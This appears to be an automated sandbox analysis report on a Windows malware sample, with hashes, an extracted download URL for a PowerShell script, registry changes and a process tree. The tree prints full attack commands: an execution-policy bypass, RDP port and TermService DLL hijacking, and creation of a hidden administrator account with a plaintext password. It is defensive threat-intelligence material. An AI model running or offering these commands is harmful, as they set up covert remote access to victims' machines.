Analysis
-
max time kernel
73s -
max time network
75s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
23-09-2021 10:58
Static task
static1
Behavioral task
behavioral1
Sample
f71c575754e1f5890ad8b35afd08b8be.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
f71c575754e1f5890ad8b35afd08b8be.exe
Resource
win10v20210408
General
-
Target
f71c575754e1f5890ad8b35afd08b8be.exe
-
Size
5.9MB
-
MD5
f71c575754e1f5890ad8b35afd08b8be
-
SHA1
69803b96f3820fabd81c79d422a1fa2a72ccb699
-
SHA256
046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
-
SHA512
32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid Process 9 1824 powershell.exe 11 1824 powershell.exe 12 1824 powershell.exe 13 1824 powershell.exe 15 1824 powershell.exe 17 1824 powershell.exe 19 1824 powershell.exe 21 1824 powershell.exe 23 1824 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/files/0x000600000001ab48-361.dat upx behavioral2/files/0x000600000001ab49-362.dat upx -
Loads dropped DLL 2 IoCs
Processes:
pid Process 2608 2608 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE80A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE84B.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ijrfa1zy.a44.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE78C.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE81B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE85B.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pkrljybx.gjw.psm1 powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe 3896 powershell.exe 3896 powershell.exe 3896 powershell.exe 3996 powershell.exe 3996 powershell.exe 3996 powershell.exe 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 1824 powershell.exe 1824 powershell.exe 1824 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
f71c575754e1f5890ad8b35afd08b8be.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 636 f71c575754e1f5890ad8b35afd08b8be.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe Token: SeIncreaseQuotaPrivilege 4020 powershell.exe Token: SeSecurityPrivilege 4020 powershell.exe Token: SeTakeOwnershipPrivilege 4020 powershell.exe Token: SeLoadDriverPrivilege 4020 powershell.exe Token: SeSystemProfilePrivilege 4020 powershell.exe Token: SeSystemtimePrivilege 4020 powershell.exe Token: SeProfSingleProcessPrivilege 4020 powershell.exe Token: SeIncBasePriorityPrivilege 4020 powershell.exe Token: SeCreatePagefilePrivilege 4020 powershell.exe Token: SeBackupPrivilege 4020 powershell.exe Token: SeRestorePrivilege 4020 powershell.exe Token: SeShutdownPrivilege 4020 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe Token: SeSystemEnvironmentPrivilege 4020 powershell.exe Token: SeRemoteShutdownPrivilege 4020 powershell.exe Token: SeUndockPrivilege 4020 powershell.exe Token: SeManageVolumePrivilege 4020 powershell.exe Token: 33 4020 powershell.exe Token: 34 4020 powershell.exe Token: 35 4020 powershell.exe Token: 36 4020 powershell.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeIncreaseQuotaPrivilege 3896 powershell.exe Token: SeSecurityPrivilege 3896 powershell.exe Token: SeTakeOwnershipPrivilege 3896 powershell.exe Token: SeLoadDriverPrivilege 3896 powershell.exe Token: SeSystemProfilePrivilege 3896 powershell.exe Token: SeSystemtimePrivilege 3896 powershell.exe Token: SeProfSingleProcessPrivilege 3896 powershell.exe Token: SeIncBasePriorityPrivilege 3896 powershell.exe Token: SeCreatePagefilePrivilege 3896 powershell.exe Token: SeBackupPrivilege 3896 powershell.exe Token: SeRestorePrivilege 3896 powershell.exe Token: SeShutdownPrivilege 3896 powershell.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeSystemEnvironmentPrivilege 3896 powershell.exe Token: SeRemoteShutdownPrivilege 3896 powershell.exe Token: SeUndockPrivilege 3896 powershell.exe Token: SeManageVolumePrivilege 3896 powershell.exe Token: 33 3896 powershell.exe Token: 34 3896 powershell.exe Token: 35 3896 powershell.exe Token: 36 3896 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeIncreaseQuotaPrivilege 3996 powershell.exe Token: SeSecurityPrivilege 3996 powershell.exe Token: SeTakeOwnershipPrivilege 3996 powershell.exe Token: SeLoadDriverPrivilege 3996 powershell.exe Token: SeSystemProfilePrivilege 3996 powershell.exe Token: SeSystemtimePrivilege 3996 powershell.exe Token: SeProfSingleProcessPrivilege 3996 powershell.exe Token: SeIncBasePriorityPrivilege 3996 powershell.exe Token: SeCreatePagefilePrivilege 3996 powershell.exe Token: SeBackupPrivilege 3996 powershell.exe Token: SeRestorePrivilege 3996 powershell.exe Token: SeShutdownPrivilege 3996 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeSystemEnvironmentPrivilege 3996 powershell.exe Token: SeRemoteShutdownPrivilege 3996 powershell.exe Token: SeUndockPrivilege 3996 powershell.exe Token: SeManageVolumePrivilege 3996 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f71c575754e1f5890ad8b35afd08b8be.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exenet.execmd.exenet.execmd.exenet.execmd.execmd.exedescription pid Process procid_target PID 636 wrote to memory of 1268 636 f71c575754e1f5890ad8b35afd08b8be.exe 68 PID 636 wrote to memory of 1268 636 f71c575754e1f5890ad8b35afd08b8be.exe 68 PID 1268 wrote to memory of 2376 1268 powershell.exe 70 PID 1268 wrote to memory of 2376 1268 powershell.exe 70 PID 2376 wrote to memory of 2608 2376 csc.exe 71 PID 2376 wrote to memory of 2608 2376 csc.exe 71 PID 1268 wrote to memory of 4020 1268 powershell.exe 72 PID 1268 wrote to memory of 4020 1268 powershell.exe 72 PID 1268 wrote to memory of 3896 1268 powershell.exe 75 PID 1268 wrote to memory of 3896 1268 powershell.exe 75 PID 1268 wrote to memory of 3996 1268 powershell.exe 77 PID 1268 wrote to memory of 3996 1268 powershell.exe 77 PID 1268 wrote to memory of 2716 1268 powershell.exe 79 PID 1268 wrote to memory of 2716 1268 powershell.exe 79 PID 1268 wrote to memory of 2732 1268 powershell.exe 80 PID 1268 wrote to memory of 2732 1268 powershell.exe 80 PID 1268 wrote to memory of 2736 1268 powershell.exe 81 PID 1268 wrote to memory of 2736 1268 powershell.exe 81 PID 1268 wrote to memory of 3980 1268 powershell.exe 84 PID 1268 wrote to memory of 3980 1268 powershell.exe 84 PID 3980 wrote to memory of 696 3980 net.exe 85 PID 3980 wrote to memory of 696 3980 net.exe 85 PID 1268 wrote to memory of 2272 1268 powershell.exe 86 PID 1268 wrote to memory of 2272 1268 powershell.exe 86 PID 2272 wrote to memory of 4092 2272 cmd.exe 87 PID 2272 wrote to memory of 4092 2272 cmd.exe 87 PID 4092 wrote to memory of 772 4092 cmd.exe 88 PID 4092 wrote to memory of 772 4092 cmd.exe 88 PID 772 wrote to memory of 3880 772 net.exe 89 PID 772 wrote to memory of 3880 772 net.exe 89 PID 1268 wrote to memory of 3148 1268 powershell.exe 90 PID 1268 wrote to memory of 3148 1268 powershell.exe 90 PID 3148 wrote to memory of 3996 3148 cmd.exe 91 PID 3148 wrote to memory of 3996 3148 cmd.exe 91 PID 3996 wrote to memory of 1324 3996 cmd.exe 92 PID 3996 wrote to memory of 1324 3996 cmd.exe 92 PID 1324 wrote to memory of 1672 1324 net.exe 93 PID 1324 wrote to memory of 1672 1324 net.exe 93 PID 2720 wrote to memory of 1016 2720 cmd.exe 97 PID 2720 wrote to memory of 1016 2720 cmd.exe 97 PID 1016 wrote to memory of 1908 1016 net.exe 98 PID 1016 wrote to memory of 1908 1016 net.exe 98 PID 2692 wrote to memory of 3704 2692 cmd.exe 101 PID 2692 wrote to memory of 3704 2692 cmd.exe 101 PID 3704 wrote to memory of 1824 3704 net.exe 102 PID 3704 wrote to memory of 1824 3704 net.exe 102 PID 2736 wrote to memory of 3584 2736 cmd.exe 105 PID 2736 wrote to memory of 3584 2736 cmd.exe 105 PID 3584 wrote to memory of 3596 3584 net.exe 106 PID 3584 wrote to memory of 3596 3584 net.exe 106 PID 4020 wrote to memory of 2540 4020 net.exe 110 PID 4020 wrote to memory of 2540 4020 net.exe 110 PID 2004 wrote to memory of 3588 2004 cmd.exe 113 PID 2004 wrote to memory of 3588 2004 cmd.exe 113 PID 3588 wrote to memory of 3060 3588 net.exe 114 PID 3588 wrote to memory of 3060 3588 net.exe 114 PID 1812 wrote to memory of 3888 1812 cmd.exe 117 PID 1812 wrote to memory of 3888 1812 cmd.exe 117 PID 3888 wrote to memory of 1008 3888 net.exe 118 PID 3888 wrote to memory of 1008 3888 net.exe 118 PID 808 wrote to memory of 2888 808 cmd.exe 121 PID 808 wrote to memory of 2888 808 cmd.exe 121 PID 3264 wrote to memory of 724 3264 cmd.exe 124 PID 3264 wrote to memory of 724 3264 cmd.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp" "c:\Users\Admin\AppData\Local\Temp\43vvo1jn\CSC732EA7F145834E02AFF745DCAD2D37AF.TMP"4⤵PID:2608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2716
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2732
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2736
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:696
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3880
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1672
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1860
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kEE2SQbH /add1⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\net.exenet.exe user wgautilacc kEE2SQbH /add2⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kEE2SQbH /add3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:3596
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵PID:4032
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2540
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:3060
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kEE2SQbH1⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net.exenet.exe user wgautilacc kEE2SQbH2⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kEE2SQbH3⤵PID:1008
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:2888
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:724
-
-
